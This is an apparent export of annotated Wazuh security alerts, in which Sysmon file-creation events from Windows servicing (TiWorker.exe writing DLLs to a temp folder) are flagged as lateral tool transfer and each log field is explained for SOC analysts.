Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.710160
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.2870179Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260632
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.286 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\API-MS-Win-Core-Kernel32-Private-L1-1-1.dll CreationUtcTime: 2025-04-20 01:55:28.284 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.286
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\API-MS-Win-Core-Kernel32-Private-L1-1-1.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.284
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.598+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.598+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  31
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.713298
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.3162385Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260644
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.313 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-processenvironment-l1-1-0.dll CreationUtcTime: 2025-04-20 01:55:28.313 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.313
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-processenvironment-l1-1-0.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.313
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.601+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.601+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  32
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.716444
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.3496143Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260657
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.348 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-shutdown-l1-1-0.dll CreationUtcTime: 2025-04-20 01:55:28.348 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.348
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-shutdown-l1-1-0.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.348
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.601+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.601+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  33
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.719550
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.3842941Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260671
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.382 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-timezone-l1-1-0.dll CreationUtcTime: 2025-04-20 01:55:28.382 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.382
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-timezone-l1-1-0.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.382
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.612+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.612+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  34
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.722656
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.4134132Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260684
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.412 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-crt-math-l1-1-0.dll CreationUtcTime: 2025-04-20 01:55:28.412 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.412
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-crt-math-l1-1-0.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.412
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.628+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.628+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  35
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.725742
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.4327048Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260692
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.431 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-crt-utility-l1-1-0.dll CreationUtcTime: 2025-04-20 01:55:28.431 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.431
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

